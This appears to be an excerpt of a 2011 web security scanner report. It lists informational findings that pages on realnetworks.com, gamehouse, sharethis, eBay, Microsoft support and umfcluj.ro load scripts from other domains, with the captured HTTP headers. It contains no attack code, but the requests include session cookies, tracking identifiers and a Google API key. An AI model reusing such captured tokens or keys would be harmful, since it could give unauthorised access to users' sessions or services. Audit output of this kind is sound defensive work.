Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/home.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.22. http://realnetworks.com/about-us/affiliate.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/about-us/affiliate.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /about-us/affiliate.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.4.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.23. http://realnetworks.com/contact-us.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/contact-us.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /contact-us.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/pressroom/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.1.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.24. http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/contact-us/realnetworks-united-states-offices.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /contact-us/realnetworks-united-states-offices.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.3.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.25. http://realnetworks.com/pressroom/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/pressroom/index.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js

Request

GET /pressroom/index.aspx HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:11:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?
http://tags.crwdcntrl.net/c/520/cc.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...
\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?" type="text/javascript"></script>
...[SNIP]...
stream_lx.ads/www.boston.com/homepage/default/1524696595/MISC3/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'MISC4') {
document.write ('<script type="text/javascript" src="http://tags.crwdcntrl.net/c/520/cc.js"></script>
...[SNIP]...

21.27. http://sharethis.com/account/signin-widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/account/signin-widget

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Request

GET /account/signin-widget HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.75b569a75a17eaa05c9e6a5ce5631fad.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __unam=8f891fa-13142cc749b-8ad1c19-2; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.1.10.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 14139
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
</div>

<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

21.28. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The response dynamically includes the following scripts from other domains:

https://secureinclude.ebaystatic.com/v4js/z/2m/losgv3zyn2yr5lrg0h4ik5yt4.js
https://secureinclude.ebaystatic.com/v4js/z/e2/1kgeg22jaq0d3efjwymeoqcvm.js
https://secureinclude.ebaystatic.com/v4js/z/eu/341wgvdjgy2abb1qzf3cxflzf.js
https://secureinclude.ebaystatic.com/v4js/z/yo/gjzdlqbe2q0kzkzs2c4o43o5q.js

Request

Response

21.29. http://support.gamehouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.gamehouse.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?
http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js
http://edge.quantserve.com/quant.js
http://realnetwork.tags.crwdcntrl.net/cc.js
http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:39 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=B30EcAZyAiZUPA9%2FBBEEYABHAjhTQF1mAHwJOgYmBX8AcgRoByEHPlBzBA5SegJ3UWYHJlNzVDxQOw0xV14GfQVPCmEHS1ZwAAoBSwo3AUUHXAQHBk8Ca1RUDzAEbgQzAGUCJ1M7XTQAJAks; path=/
RNT-Time: D=121840 t=1311107139940601
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 65280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...


<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.30. http://support.gamehouse.com/app/answers/detail/a_id/861/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.gamehouse.com
Path:	/app/answers/detail/a_id/861/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?
http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js
http://edge.quantserve.com/quant.js
http://realnetwork.tags.crwdcntrl.net/cc.js
http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:34 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UykAdAB0ByNaMlMjABUAZAVCBz1QQwA7BHgNPgMjB30MflM7ByECOwc0VixXclEiVSUDawMrU3ADZAZ2AW5VIwcwWjoDOQJ4UTcCOVJiAiNTfgB0AGQHYFp8U28AMgBsBWQHd1A%2FAHYERQ00A2wHNAx5U2gHMwJoB3VWc1clUTJVdANzA3xTcANmBgsBPVVlByNaOANaAnZROQI9UmcCI1N%2BAHQAPwc3WjlTIwAOAHwFLQd3UGAAdgQ4DXcDXQd%2BDC9TPwdwAnIHb1ZvVz5RC1UoAx0DY1McA3cGDgEXVTgHRlpYA1QCGlFuAllSOwI4U2QANwBwBzxaNVMjAC4%3D; path=/
RNT-Time: D=151655 t=1311107254201788
RNT-Machine: 04
Vary: Accept-Encoding
Content-Length: 71984
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...


<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.31. http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.gamehouse.com
Path:	/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?
http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js
http://edge.quantserve.com/quant.js
http://realnetwork.tags.crwdcntrl.net/cc.js
http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:38 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9YLAx4ACRSOgR0ARQIbFUSVmxTQFFqUCwLOFd3USsNfwZuUXcGP1dnVC4MKQd0VCRQOFV9CCsBZlcnBGsGCQQgDmcEPgBuVysAP1FnBjFVdlgiDCkAN1I4BG4Bfgg%2FVWNWMFMkUVhQegtxVzZRZg0pBmFRNAZoVzNUIAwxB1pUJFBFVWcIZAFgVyAEYwZiBGsOJQR1ACNXYgB6UXcGKVV2WEkMagBrUmUEcwFgCDlVOFZ3U3VRcFAzCyBXd1FaDXEGLVE0BlpXP1RmDCkHO1QkUDpVMAg4ASdXeAR9BnAEZw50BDwAdFdbACZRJgZgVSdYfQxiAGlSbgQKAX0IRVViVkpTdlFfUBULalcSUV0NCAZBUToGV1c7VDsMPQdgVHFQP1U7CCsBeA%3D%3D; path=/
RNT-Time: D=319510 t=1311107258546611
RNT-Machine: 06
Vary: Accept-Encoding
Content-Length: 67417
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...


<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.32. http://support.gamehouse.com/app/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.gamehouse.com
Path:	/app/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?
http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js
http://edge.quantserve.com/quant.js
http://realnetwork.tags.crwdcntrl.net/cc.js
http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:53 GMT
Server: Apache
P3P: policyref="http://support.gamehouse.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=BH5TJw15BCAEbAR0AhcJbVcQATsHFFVuA38PPAQkUykMfgRoV3EFPAQnV10CKlYjBjFTcgAgCGAGbVVpVl9SKVEbCWJRHQYgDQcIQldqUhYEX1NQDUQEbQQEBDsCaAk%2BVzIBJAdvVTwDJw8q; path=/
RNT-Time: D=115988 t=1311107153516068
RNT-Machine: 02
Vary: Accept-Encoding
Content-Length: 62277
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
</div>
                       <script type="text/javascript" src="http://content.atomz.com/sp10041f2e/publish/autocomplete_data.js"></script>
...[SNIP]...


<script src="http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?" type="text/javascript" language="javascript"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

   <script src="http://realnetwork.tags.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script defer='defer' type='text/javascript' src='http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js' ></script>
...[SNIP]...

21.33. http://support.microsoft.com/contactus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.microsoft.com
Path:	/contactus/

Issue detail

The response dynamically includes the following script from another domain:

http://ads.msn.com/library/dapmsn.js

Request

GET /contactus/ HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083

Response

21.34. http://umfcluj.ro/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:02 GMT
Content-Length: 38701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.35. http://umfcluj.ro/Detaliu.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/Detaliu.aspx

Issue detail

The response dynamically includes the following script from another domain:

